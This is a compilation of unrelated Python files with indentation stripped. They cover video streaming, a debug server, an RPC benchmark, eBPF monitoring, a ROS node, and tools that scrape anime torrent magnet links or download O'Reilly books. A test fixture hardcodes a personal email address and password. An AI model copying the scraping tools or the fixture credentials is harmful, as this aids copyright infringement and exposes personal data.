def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.input_opts is None:
self.input_opts = {}
if self.output_opts is None:
self.output_opts = {'f': 'rawvideo', 'pix_fmt': 'rgb24'}
if self.filters is None:
self.filters = []
self.buffer = Queue(maxsize=self.buffer_size)
if self.frame_size is not None:
self._stream_info = {
'width': self.frame_size[0],
'height': self.frame_size[1]}
else:
# Probe stream information
self._stream_info = next(
s
for s in ffmpeg.probe(self.url.geturl(), **self.input_opts)['streams']
if s['codec_type'] == 'video')
# Initialise stream
self.stream = ffmpeg.input(self.url.geturl(), **self.input_opts)
for filter_ in self.filters:
filter_name, filter_args, filter_kwargs = filter_
self.stream = self.stream.filter(
filter_name, *filter_args, **filter_kwargs
)
self.stream = (
self.stream
.output('pipe:', **self.output_opts)
.global_args('-y', '-loglevel', 'panic')
.run_async(pipe_stdout=True)
)
# Initialise capture thread
self._capture_thread = threading.Thread(target=self._run)
self._capture_thread.daemon = True
self._capture_thread.start()
@BufferedGenerator.generator_method
def frames_gen(self):
while self._capture_thread.is_alive():
# if not self.buffer.empty():
frame = self.buffer.get()
timestamp = frame.timestamp
yield timestamp, frame
def _run(self):
while self.stream.poll() is None:
width = int(self._stream_info['width'])
height = int(self._stream_info['height'])
# Read bytes from stream
in_bytes = self.stream.stdout.read(width * height * 3)
if in_bytes:
# Transform bytes to pixels
frame_np = (
np.frombuffer(in_bytes, np.uint8)
.reshape([height, width, 3])
)
frame = ImageFrame(frame_np, datetime.datetime.now())
# Write new frame to buffer
self.buffer.put(frame)
|
console_dispatcher.py
|
import logging
import sys
import threading
from django.core.management.base import BaseCommand
from django.conf import settings
from fastapp.executors.heartbeat import update_status
from fastapp.console import PusherSenderThread
logger = logging.getLogger("fastapp.executors.console")
class Command(BaseCommand):
args = '<poll_id poll_id ...>'
help = 'Closes the specified poll for voting'
def handle(self, *args, **options):
THREAD_COUNT = settings.FASTAPP_CONSOLE_SENDER_THREADCOUNT
threads = []
host = getattr(settings, "RABBITMQ_HOST", "localhost")
port = getattr(settings, "RABBITMQ_PORT", 5672)
username = getattr(settings, "RABBITMQ_ADMIN_USER", "guest")
password = getattr(settings, "RABBITMQ_ADMIN_PASSWORD", "guest")
# create connection to pusher_queue
CONSOLE_QUEUE = "pusher_events"
queues_consume_console = [[CONSOLE_QUEUE, True]]
for c in range(0, THREAD_COUNT):
name = "PusherSenderThread-%s" % c
thread = PusherSenderThread(name, host, port, "/", username, password, queues_consume=queues_consume_console, ttl=3000)
logger.info("Start '%s'" % name)
threads.append(thread)
thread.daemon = True
thread.start()
update_status_thread = threading.Thread(target=update_status, args=["Console", THREAD_COUNT, threads])
update_status_thread.daemon = True
update_status_thread.start()
for t in threads:
#print "join %s " % t
try:
logger.info("%s Thread started" % THREAD_COUNT)
t.join(1000)
except KeyboardInterrupt:
print("Ctrl-c received.")
sys.exit(0)
|
server.py
|
import sys
import socket
import select
import threading
import time
# settings
class SETTINGS:
HOST = '127.0.0.1'
PORT = 54326
class TYPE:
CONSOLE = 'CONSOLE'
DEBUG = 'DEBUG'
# messages
class MESSAGE:
AMENDED = 'AMENDED'
BP_CONFIRM = 'BP_CONFIRM'
BP_RESET = 'BP_RESET'
BP_WAIT = 'BP_WAIT'
BREAK = 'BREAK'
CONTINUED = 'CONTINUED'
DEBUG = 'DEBUG'
DISPLAY = 'DISPLAY'
ENTRY = 'ENTRY'
EXCEPTION = 'EXCEPTION'
EXITED = 'EXITED'
INFO = 'INFO'
PAUSED = 'PAUSED'
SIGNAL = 'SIGNAL'
STEPPED = 'STEPPED'
SYNTAX_ERROR = 'SYNTAX_ERROR'
THREADS = 'THREADS'
RADIX = 'RADIX'
PATHFILTER = 'PATHFILTER'
# commands
class COMMAND:
AMEND = 'a' # a ident frame name value
BP_RESET = 'bpr' # bpr [file [line]]
BP_SET = 'bps' # bps file line
CONTINUE = 'c'
DISPLAY = 'd' # d [frameNum [ident [fullName [start [count]]]]] // frame is zero-based
EXEC = 'e' # e expression // execute expression in the current frame
FRAME = 'f' # f [ident [frameStart [frameNum]]] // frame is zero-based
INFO = 'i'
NEXT = 'n' # n [ident] // step over
PAUSE = 'p'
RETURN = 'r' # r [ident] // step out
STEP = 's' # s [ident] // step in
THREADS = 't'
RADIX = 'x' # x [10|16] // default 10
PATHFILTER = 'y' # y [path] // always trace this path
# server only commands
QUIT = 'q'
HELP = 'h'
_helpInfo = """\
AMEND = 'a' # a ident frame name value
BP_RESET = 'bpr' # bpr [file [line]]
BP_SET = 'bps' # bps file line
CONTINUE = 'c'
DISPLAY = 'd' # d [ident [frame [fullName [start [count]]]]] // frame is zero-based
EXEC = 'e' # e expression // execute expression in the current frame
FRAME = 'f' # f [ident [frameStart [frameNum]]] // frame is zero-based
GOTO = 'g' # g ident line
GOTO_TARGETS = 'gt' # gt file line // test if we can go to target from current place
INFO = 'i'
MODE = 'm' # m [0|1] // user | developer
NEXT = 'n' # n [ident] // step over
PAUSE = 'p'
RETURN = 'r' # r [ident] // step out
STEP = 's' # s [ident] // step in
THREADS = 't'
RADIX = 'x' # x [10|16] // default 10
PATHFILTER = 'y' # y [path] // always trace this path
# server only commands
QUIT = 'q'
HELP = 'h'
"""
class Connection:
def __init__(self, socket):
self._socket = socket
self._recvBuffer = b''
self._sendBuffer = b''
self._type = None
def getType(self):
return self._type
def close(self):
try:
self._socket.close()
except:
pass
self._socket = None
def read(self):
""" EOL delimited. """
self._read()
lines = []
start = 0
while True:
idx = self._recvBuffer.find(b"\n", start)
if idx == -1:
break
line = self._recvBuffer[start:idx].decode()
# first message is the type
if not self._type:
self._type = line
elif line:
lines.append(line)
start = idx + 1
self._recvBuffer = self._recvBuffer[start:]
return lines
def post(self, line):
""" One command per line. Add EOL at the and """
self._sendBuffer += line.encode()
self._sendBuffer += b'\n'
def write(self):
self._write()
def wantRead(self):
return self._socket
def wantWrite(self):
if self._sendBuffer:
return self._socket
return None
def _read(self):
try:
data = self._socket.recv(4096)
if data:
self._recvBuffer += data
except:
pass
def _write(self):
if self._sendBuffer:
try:
sent = self._socket.send(self._sendBuffer)
self._sendBuffer = self._sendBuffer[sent:]
except:
pass
class DebugServer:
def __init__(self, port):
self._port = port
self._listenSocket = None
self._connections = None
self._thread = None
self._stopped = False
def start(self):
if self._thread:
self.stop()
self.join()
self._thread = threading.Thread(target=self._run)
self._stopped = False
self._thread.start()
def stop(self):
self._stopped = True
def join(self):
if self._thread:
self._thread.join()
def isAlive(self):
return self._thread is not None and self._thread.is_alive()
def _run(self):
self._listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self._listenSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self._listenSocket.bind((SETTINGS.HOST, self._port))
print('listening port %i' % self._port)
except:
print('port %i is busy' % self._port)
sys.exit()
self._listenSocket.listen(2)
self._listenSocket.setblocking(False)
self._connections = {}
try:
while not self._stopped:
inputs = [self._listenSocket]
outputs = []
for conn in self._connections.values():
inp = conn.wantRead()
if inp:
inputs.append(inp)
outp = conn.wantWrite()
if outp:
outputs.append(outp)
readable, writable, exceptional = select.select(inputs, outputs, inputs)
for s in readable:
if s == self._listenSocket:
self._acceptWrapper()
else:
connection = self._connections[s]
lines = connection.read()
if len(lines) > 0:
if connection.getType() == TYPE.DEBUG:
# print lines
for line in lines:
print(line)
# if line == MESSAGE.EXITED:
# # exit loop
# self._stopped = True
elif connection.getType() == TYPE.CONSOLE:
# test if "pause"
if line == COMMAND.PAUSE:
pass
# pass lines to debuggers
for conn in self._connections.values():
if conn.getType() == TYPE.DEBUG:
for line in lines:
conn.post(line)
for s in writable:
if s != self._listenSocket:
self._connections[s].write()
for s in exceptional:
if s != self._listenSocket:
self._connections[s].close()
del self._connections[s]
except:
pass
for connection in self._connections.values():
try:
connection.close()
except:
pass
self._connections = None
try:
self._listenSocket.close()
except:
pass
self._listenSocket = None
self._thread = None
self._selector = None
def _acceptWrapper(self):
conn, _ = self._listenSocket.accept()
# print("Connected %s" % repr(addr))
conn.setblocking(False)
connection = Connection(conn)
self._connections[conn] = connection
if __name__ == "__main__":
_usage = """\
usage: server.py -p port
Start debug server."""
import getopt
opts, args = getopt.getopt(sys.argv[1:], 'hp:', ['help','port='])
for opt, optarg in opts:
if opt in ['-h', '--help']:
print(_usage)
sys.exit()
elif opt in ['-p', '--port']:
SETTINGS.PORT = int(optarg)
else:
print("Unknown option %s" % opt)
server = DebugServer(SETTINGS.PORT)
server.start()
time.sleep(0.5)
try:
consoleSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
consoleSocket.connect_ex((SETTINGS.HOST, SETTINGS.PORT))
consoleSocket.send((TYPE.CONSOLE + "\n").encode())
while server.isAlive():
if sys.version_info[0] < 3:
cmd = raw_input()
else:
cmd = input()
if cmd == COMMAND.HELP:
print(_helpInfo)
else:
consoleSocket.send((cmd + "\n").encode())
if cmd == COMMAND.QUIT:
break
except:
pass
server.stop()
try:
consoleSocket.send(b"\n")
except:
pass
server.join()
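# Editorial note (hedged): an example console session against this server, using the
# single-letter commands defined in COMMAND above. File names and line numbers are
# placeholders.
#
#   bps my_script.py 42    # set a breakpoint
#   c                      # continue until it is hit
#   t                      # list threads
#   d 0                    # display variables of the innermost frame
#   s                      # step in
#   q                      # quit the server
#
# Each command is sent as a single EOL-terminated line (see Connection.post) and is
# forwarded verbatim to every connected debugger of TYPE.DEBUG.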
|
benchmark_rap.py
|
import asyncio
import multiprocessing
import time
import uvloop
from rap.client import Client
from rap.server import Server
NUM_CALLS: int = 10000
def run_server() -> None:
async def test_sum(a: int, b: int) -> int:
await asyncio.sleep(0.01)
return a + b
loop: asyncio.AbstractEventLoop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
rpc_server: Server = Server("example")
rpc_server.register(test_sum)
loop.run_until_complete(rpc_server.run_forever())
def run_client() -> None:
loop: asyncio.AbstractEventLoop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
client: Client = Client("example", [{"ip": "localhost", "port": "9000"}])
@client.register()
async def test_sum(a: int, b: int) -> int:
return a + b
async def request() -> None:
for _ in range(NUM_CALLS):
await test_sum(1, 2)
loop.run_until_complete(client.start())
start: float = time.time()
loop.run_until_complete(request())
print("call: %d qps" % (NUM_CALLS / (time.time() - start)))
loop.run_until_complete(client.stop())
if __name__ == "__main__":
p = multiprocessing.Process(target=run_server)
p.start()
time.sleep(1)
run_client()
p.terminate()
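# Editorial note (hedged): with a 10 ms asyncio.sleep in the server handler and strictly
# sequential awaits in request(), the theoretical ceiling is roughly 1 / 0.01 = 100 qps
# per connection, so the printed figure should land a little below that once transport
# overhead is included.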
|
main.py
|
import re
import time
import asyncio
import aiohttp
import json
import os, sys, subprocess, threading
from os import path
from PySide2.QtUiTools import QUiLoader
from PySide2.QtWidgets import *
from PySide2.QtCore import *
from PySide2.QtXml import QDomNode
import requests
from bs4 import BeautifulSoup
from MainWindow import Ui_MainWindow
ROOT_URL = 'http://horriblesubs.info'
ALL_SHOWS = ROOT_URL + '/shows/'
API_URL = ROOT_URL + '/api.php?method=getshows&type=show&showid={}&nextid={}'
EPISODES = list()
QUALITIES = ['1080', '720', '480']
SELECTED_SHOW = None
INTELL_PARSE = False
# NEW STUFF
SELECTED_SHOW_SAVED = None
DOWNLOAD_HISTORY = {}
DOWNLOAD_HISTORY["Downloaded"] = []
def open_magnet(magnet):
"""Open magnet according to os."""
if sys.platform.startswith('linux'):
subprocess.Popen(['xdg-open', magnet],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elif sys.platform.startswith('win32'):
os.startfile(magnet)
elif sys.platform.startswith('cygwin'):
os.startfile(magnet)
elif sys.platform.startswith('darwin'):
subprocess.Popen(['open', magnet],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
subprocess.Popen(['xdg-open', magnet],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
class AnimeShow(QListWidgetItem):
def __init__(self, show_link, title):
super().__init__(title)
self.show_link = show_link
self.title = title
def __str__(self):
return '{} - {}'.format(self.title, self.show_link)
def __repr__(self):
return '{} - {}'.format(self.title, self.show_link)
class Episode(QListWidgetItem):
def __init__(self, title, magnet, quality):
self.repr_string = '{} ({}p)'.format(title, quality)
super().__init__(self.repr_string)
self.title = title
self.magnet = magnet
self.quality = quality
def __str__(self):
return self.repr_string
def __repr__(self):
return self.repr_string
async def fetch_html(session, link):
async with session.get(link) as response:
return await response.text()
async def fetch_links(show, show_id, next_iter, quality):
async with aiohttp.ClientSession() as session:
api = API_URL.format(show_id, next_iter)
html = await fetch_html(session, api)
soup = BeautifulSoup(html, 'lxml')
if soup.body.text == 'DONE':
return
links = soup.find_all(class_='rls-info-container')
for link in links:
quality_block = link.find('div', class_='link-{}p'.format(quality))
_link = quality_block.find(title='Magnet Link')
title = '{} - {}'.format(show.get('title'), link.get('id'))
episode = Episode(title, _link.get('href'), quality)
EPISODES.append(episode)
def get_episodes(show, quality='1080'):
html = requests.get(ROOT_URL + show['href']).text
soup = BeautifulSoup(html, 'lxml')
main_div = soup.find('div', class_='entry-content')
script_block = main_div.find('script').text
show_id = re.findall(r'\d+', script_block)[0]
pages = 12
if(INTELL_PARSE):
api = API_URL.format(show_id, 0)
api_html = requests.get(api).text
api_soup = BeautifulSoup(api_html, 'lxml')
last_episode = int(api_soup.find('div', class_='rls-info-container').get('id'))
pages = int(last_episode/12) + 1
EPISODES.clear()
tasks = list()
loop = asyncio.new_event_loop()
for iteration in range(pages):
task = loop.create_task(fetch_links(show, show_id, iteration, quality))
tasks.append(task)
wait_tasks = asyncio.wait(tasks)
loop.run_until_complete(wait_tasks)
return sorted(EPISODES)
def matched_shows(search):
html = requests.get(ALL_SHOWS).text
soup = BeautifulSoup(html, 'lxml')
main_div = soup.find('div', class_='post-inner-content')
_matched_shows = main_div.find_all('a', title=re.compile('(?i){}'.format(search)))
result = list()
for show in _matched_shows:
anime_show = AnimeShow(show, show.text)
result.append(anime_show)
return result
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.loadingStatus.setVisible(False)
self.setFixedSize(self.size())
self.selectQuality.addItems(QUALITIES)
self.selectQuality.currentTextChanged.connect(self.quality_changed)
self.animeView.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.animeView.doubleClicked.connect(self.display_episodes)
self.searchField.installEventFilter(self)
self.searchButton.clicked.connect(self.fill_table)
self.downloadButton.clicked.connect(self.download_selected)
self.selectAll.clicked.connect(self.select_all)
self.deselectAll.clicked.connect(self.deselect_all)
self.intellTurn.stateChanged.connect(self.intellTurn_changed)
self.save.clicked.connect(self.save_anime)
self.unsave.clicked.connect(self.unsave_anime)
self.animeView.clicked.connect(self.select_anime)
self.savedView.clicked.connect(self.select_saved)
self.autoDownload.clicked.connect(self.download_saved)
self.jsonToSaved()
def eventFilter(self, widget, event):
if event.type() == QEvent.KeyPress and widget is self.searchField:
key = event.key()
if key == Qt.Key_Return:
self.fill_table()
return QWidget.eventFilter(self, widget, event)
def fill_table(self):
global SELECTED_SHOW
SELECTED_SHOW = None
self.animeView.clear()
thread = threading.Thread(target=self.fill_table_thread)
thread.start()
self.loadingStatus.setVisible(True)
def fill_table_thread(self):
if self.searchField.text() == '':
return
shows = matched_shows(self.searchField.text())
for show in shows:
self.animeView.addItem(show)
self.loadingStatus.setVisible(False)
def display_episodes(self):
thread = threading.Thread(target=self.display_episodes_thread)
thread.start()
self.loadingStatus.setVisible(True)
def display_episodes_thread(self):
global SELECTED_SHOW
start = time.time()
selected_item = None
if(SELECTED_SHOW is None):
selected_item = self.animeView.selectedItems()[0]
SELECTED_SHOW = AnimeShow(selected_item.show_link, selected_item.title) # Save the selected show to the global scope
else:
selected_item = SELECTED_SHOW
selected_quality = self.selectQuality.currentText()
episodes = get_episodes(selected_item.show_link, selected_quality)
self.animeView.clear()
for episode in episodes:
self.animeView.addItem(episode)
print(time.time() - start)
self.loadingStatus.setVisible(False)
def quality_changed(self):
if(SELECTED_SHOW is None):
return
selected_quality = self.selectQuality.currentText()
self.animeView.clear()
self.display_episodes()
def download_selected(self):
items = self.animeView.selectedItems()
for item in items:
open_magnet(item.magnet)
def select_all(self):
self.animeView.selectAll()
def deselect_all(self):
self.animeView.clearSelection()
def intellTurn_changed(self):
global INTELL_PARSE
INTELL_PARSE = not INTELL_PARSE
# NEW STUFF
def select_anime(self):
global SELECTED_SHOW
selected_item = self.animeView.selectedItems()[0]
SELECTED_SHOW = AnimeShow(selected_item.show_link, selected_item.title) #selecting episodes probs
def select_saved(self):
global SELECTED_SHOW_SAVED
selected_item = self.savedView.selectedItems()[0]
SELECTED_SHOW_SAVED = AnimeShow(selected_item.show_link, selected_item.title)
def unsave_anime(self):
global SELECTED_SHOW_SAVED
if(SELECTED_SHOW_SAVED is None):
return
self.savedView.takeItem(self.savedView.row(self.savedView.selectedItems()[0]))
self.savedToJson()
def save_anime(self):
global SELECTED_SHOW
if(SELECTED_SHOW is None):
return
self.savedView.addItem(SELECTED_SHOW)
self.savedToJson()
def download_saved(self):
global DOWNLOAD_HISTORY
selected_quality = self.selectQuality.currentText()
toDownload = []
allEps = [[],[]]
for index in range(self.savedView.count()):
link = self.savedView.item(index).show_link
allEps[0].append(self.savedView.item(index).title)
allEps[1].append(get_episodes(link, selected_quality))
toDownload = self.checkDownloaded(allEps)
self.saveDownloadHist(allEps)
self.downloadView.clear()
if len(toDownload) == 0:
self.downloadView.addItem("No new updates!")
for episode in toDownload:
self.downloadView.addItem(episode.title)
print(episode)
open_magnet(episode.magnet)
DOWNLOAD_HISTORY = {}
DOWNLOAD_HISTORY["Downloaded"] = []
def checkDownloaded(self, allEps):
toDownload = []
if path.exists("download_history.json"):
with open("download_history.json", 'r', encoding='utf-8', errors='ignore') as json_file:
data = json.load(json_file)
for title in allEps[0]: #search for all titles
added = False
for x in range(len(data["Downloaded"])): #throughout all of the found data
if data["Downloaded"][x].get(title, "None") != "None":
for eps in allEps[1][allEps[0].index(title)]:
if str(eps) not in [str(z) for z in data["Downloaded"][x].get(title)]:
toDownload.append(eps)
break
elif x == len(data["Downloaded"]) - 1 and not added:
added = True
for eps in allEps[1][allEps[0].index(title)]:
toDownload.append(eps)
return toDownload
def saveDownloadHist(self, allEps):
global DOWNLOAD_HISTORY
for i in range(len(allEps[0])):
DOWNLOAD_HISTORY["Downloaded"].append({
allEps[0][i]: tuple([str(i) for i in allEps[1][i]])
})
with open("download_history.json", "w") as outfile:
json.dump(DOWNLOAD_HISTORY, outfile, indent=4, sort_keys=True)
def savedToJson(self):
data = {}
data["Saved_Shows"] = []
for index in range(self.savedView.count()):
data["Saved_Shows"].append({
"title": self.savedView.item(index).title,
"link": str(self.savedView.item(index).show_link)
})
with open("saved.json", "w") as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
def jsonToSaved(self):
if path.exists("saved.json"):
with open("saved.json") as json_file:
data = json.load(json_file)
for anime in data["Saved_Shows"]:
link = BeautifulSoup(anime["link"],"lxml").a
self.savedView.addItem(AnimeShow(link, anime["title"]))
if __name__ == "__main__":
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
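# Editorial note (hedged): approximate shapes of the JSON files written by savedToJson()
# and saveDownloadHist() above; titles and links are placeholders.
#
# saved.json:
#   {"Saved_Shows": [{"title": "Some Show", "link": "<a href=\"/shows/some-show/\" title=\"Some Show\">Some Show</a>"}]}
#
# download_history.json (tuples are serialized as JSON lists):
#   {"Downloaded": [{"Some Show": ["Some Show - 01 (1080p)", "Some Show - 02 (1080p)"]}]}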
|
ajtrace.py
|
#!/usr/bin/python
import argparse
import logging
import signal
import threading
import time
from ebpf_modules import ebpf_modules, Controller
from graphite import GraphiteBackend
from settings import GlobalConfig as config
controller = Controller()
def signal_handler(signum, frame):
""" Send a message to all ebpf modules to stop """
controller.stopped = True
def setup_logging():
log_level = config.get('log_level', 'info')
log_file = config.get('log_file')
level = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}.get(log_level.lower())
if not level:
raise ValueError("Unknown log level '%s'" % log_level.lower())
logging.basicConfig(filename=log_file, level=level)
def main():
parser = argparse.ArgumentParser(description='ajtrace - eBPF base monitoring tool')
parser.add_argument('-c', '--config', default='config.yml', help='config file')
args = parser.parse_args()
config.initialize(args.config)
setup_logging()
host = config.get('graphite_host', 'localhost')
port = config.get('graphite_port', 2003)
threads = []
for m in config.get('modules'):
if m.get('type') in ebpf_modules:
c = ebpf_modules[m['type']](m)
logging.info('starting \'%s\' module' % m['type'])
# create a dedicated connection for each module
storage = GraphiteBackend(host, port)
storage.connect()
thread = threading.Thread(target=c.run, args=(storage, controller, ))
thread.start()
logging.debug('thread started')
threads.append(thread)
# TODO: It looks like a race condition occurs when two modules are
# installed simultaneously. Should think of a better solution.
time.sleep(1)
else:
raise ValueError("Unknown module type '%s'" % m.get('type'))
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# wait for Ctrl+C
while 1:
time.sleep(1)
if controller.stopped:
break
logging.info('stopping all threads')
for t in threads:
t.join()
logging.info('done')
if __name__ == '__main__':
main()
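# Editorial note (hedged): main() expects a config.yml of roughly this shape,
# reconstructed from the config.get() calls above. The module type and any per-module
# options are placeholders that depend on what ebpf_modules provides.
#
# log_level: info
# log_file: /var/log/ajtrace.log
# graphite_host: localhost
# graphite_port: 2003
# modules:
#   - type: some_ebpf_module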
|
utils.py
|
import threading
from django.contrib.auth.models import User
from django.core import management
from jsonrpc._json import loads, dumps
from six.moves.urllib import request as urllib_request
from six.moves.urllib import parse as urllib_parse
from jsonrpc.proxy import ServiceProxy
TEST_DEFAULTS = {
'ROOT_URLCONF': 'test.jsontesturls',
'DEBUG': True,
'DEBUG_PROPAGATE_EXCEPTIONS': True,
'DATETIME_FORMAT': 'N j, Y, P',
'USE_I18N': False,
'INSTALLED_APPS': (
'jsonrpc',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions'),
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.sqlite3',
},
},
'MIDDLEWARE_CLASSES': (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
'AUTHENTICATION_BACKENDS': ('django.contrib.auth.backends.ModelBackend',),
'TEMPLATE_LOADERS': (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source'),
}
from django.conf import settings
settings.configure(**TEST_DEFAULTS)
import django
if hasattr(django, 'setup'):
# Run django.setup() for Django>=1.7
django.setup()
def _call(host, req):
return loads(urllib_request.urlopen(host, dumps(req).encode('utf-8')).read().decode('utf-8'))
class JsonServer(object):
def _thread_body(self):
try:
from wsgiref.simple_server import make_server
from django.core.handlers.wsgi import WSGIHandler
management.call_command('migrate', interactive=False)
try:
User.objects.create_user(username='rishi', email='rishijha424@gmail.com', password='password').save()
except Exception:
pass
http = make_server('', 8999, WSGIHandler())
print('Server created. continue={0}'.format(self.continue_serving))
self.event.set() # notify parent thread that the server is ready to serve requests
while self.continue_serving:
print('Waiting for request!')
http.handle_request()
self.n_requests += 1
print('Handled {0} requests!'.format(self.n_requests))
print('Got server stop! requests={0}'.format(self.n_requests))
http.server_close()
print('Server closed!')
except Exception as e:
import traceback
traceback.print_exc()
print('Error starting server: {0}'.format(e))
finally:
if not self.event.is_set():
self.event.set()
def start(self):
print('Starting Server...')
self.continue_serving = True
self.n_requests = 0
self.event = threading.Event()
self.t = threading.Thread(target=self._thread_body)
self.t.start()
self.event.wait()
return self
def stop(self):
print('Stopping Server...')
self.continue_serving = False
try:
proxy = ServiceProxy('http://127.0.0.1:8999/json/', version=2.0)
proxy.jsonrpc.test(string='Hello')['result']
except: # doesn't matter if this fails
pass
self.t.join(2.0)
return self
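# Hedged usage sketch (editorial addition): how a test might wrap a JSON-RPC call with
# the JsonServer above. The `jsonrpc.test` method mirrors the call already made in
# stop(); the __main__ guard is an assumption, not part of the original.
if __name__ == '__main__':
    server = JsonServer().start()
    try:
        proxy = ServiceProxy('http://127.0.0.1:8999/json/', version=2.0)
        print(proxy.jsonrpc.test(string='Hello')['result'])
    finally:
        server.stop()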
|
image_average_tristan_node.py
|
#!/usr/bin/env python
from __future__ import division
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
import numpy as np
import threading
class ImageAverageNode(object):
def __init__(self):
self.node_name = "Image Average"
# Thread lock
self.thread_lock = threading.Lock()
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~average_image", Image, queue_size=1)
self.cma_image = []
self.img_seq = 0
# Verbose option
#self.verbose = rospy.get_param('~verbose')
self.verbose = False
#if self.verbose:
# self.toc_pre = rospy.get_time()
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage, args=(image_msg,))
thread.daemon = True
thread.start()
# Returns right away
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.0))
# Process image here
if (self.img_seq == 0):
self.cma_image = image_cv
self.img_seq = 1
else:
self.cma_image = self.cma_image + (image_cv - self.cma_image) * (1.0 / (self.img_seq+1))
self.img_seq += 1
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(self.cma_image.astype(np.uint8), "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[VirtualMirrorNode] Shutdown.")
if __name__ == '__main__':
rospy.init_node('image_average_tristan_node',anonymous=False)
image_average_node = ImageAverageNode()
rospy.on_shutdown(image_average_node.onShutdown)
rospy.spin()
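# Editorial note (hedged): the update in processImage() is the standard cumulative
# moving average, CMA_{n+1} = CMA_n + (x_{n+1} - CMA_n) / (n + 1). For example,
# averaging pixel values 10, 20, 30 gives 10 -> 10 + (20 - 10)/2 = 15 ->
# 15 + (30 - 15)/3 = 20, which is the true mean of the three frames.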
|
safaribooks.py
|
#!/usr/bin/env python3
# coding: utf-8
import pathlib
import re
import os
import sys
import json
import shutil
import getpass
import logging
import argparse
import requests
import traceback
from html import escape
from random import random
from lxml import html, etree
from multiprocessing import Process, Queue, Value
from urllib.parse import urljoin, urlparse, parse_qs, quote_plus
PATH = os.path.dirname(os.path.realpath(__file__))
COOKIES_FILE = os.path.join(PATH, "cookies.json")
ORLY_BASE_HOST = "oreilly.com" # PLEASE INSERT URL HERE
SAFARI_BASE_HOST = "learning." + ORLY_BASE_HOST
API_ORIGIN_HOST = "api." + ORLY_BASE_HOST
ORLY_BASE_URL = "https://www." + ORLY_BASE_HOST
SAFARI_BASE_URL = "https://" + SAFARI_BASE_HOST
API_ORIGIN_URL = "https://" + API_ORIGIN_HOST
PROFILE_URL = SAFARI_BASE_URL + "/profile/"
# DEBUG
USE_PROXY = False
PROXIES = {"https": "https://127.0.0.1:8080"}
class Display:
BASE_FORMAT = logging.Formatter(
fmt="[%(asctime)s] %(message)s",
datefmt="%d/%b/%Y %H:%M:%S"
)
SH_DEFAULT = "\033[0m" if "win" not in sys.platform else "" # TODO: colors for Windows
SH_YELLOW = "\033[33m" if "win" not in sys.platform else ""
SH_BG_RED = "\033[41m" if "win" not in sys.platform else ""
SH_BG_YELLOW = "\033[43m" if "win" not in sys.platform else ""
def __init__(self, log_file):
self.output_dir = ""
self.output_dir_set = False
self.log_file = os.path.join(PATH, log_file)
self.logger = logging.getLogger("SafariBooks")
self.logger.setLevel(logging.INFO)
logs_handler = logging.FileHandler(filename=self.log_file)
logs_handler.setFormatter(self.BASE_FORMAT)
logs_handler.setLevel(logging.INFO)
self.logger.addHandler(logs_handler)
self.columns, _ = shutil.get_terminal_size()
self.logger.info("** Welcome to SafariBooks! **")
self.book_ad_info = False
self.css_ad_info = Value("i", 0)
self.images_ad_info = Value("i", 0)
self.last_request = (None,)
self.in_error = False
self.state_status = Value("i", 0)
sys.excepthook = self.unhandled_exception
def set_output_dir(self, output_dir):
self.info("Output directory:\n %s" % output_dir)
self.output_dir = output_dir
self.output_dir_set = True
def unregister(self):
self.logger.handlers[0].close()
sys.excepthook = sys.__excepthook__
def log(self, message):
try:
self.logger.info(str(message, "utf-8", "replace"))
except (UnicodeDecodeError, Exception):
self.logger.info(message)
def out(self, put):
pattern = "\r{!s}\r{!s}\n"
try:
s = pattern.format(" " * self.columns, str(put, "utf-8", "replace"))
except TypeError:
s = pattern.format(" " * self.columns, put)
sys.stdout.write(s)
def info(self, message, state=False):
self.log(message)
output = (self.SH_YELLOW + "[*]" + self.SH_DEFAULT if not state else
self.SH_BG_YELLOW + "[-]" + self.SH_DEFAULT) + " %s" % message
self.out(output)
def error(self, error):
if not self.in_error:
self.in_error = True
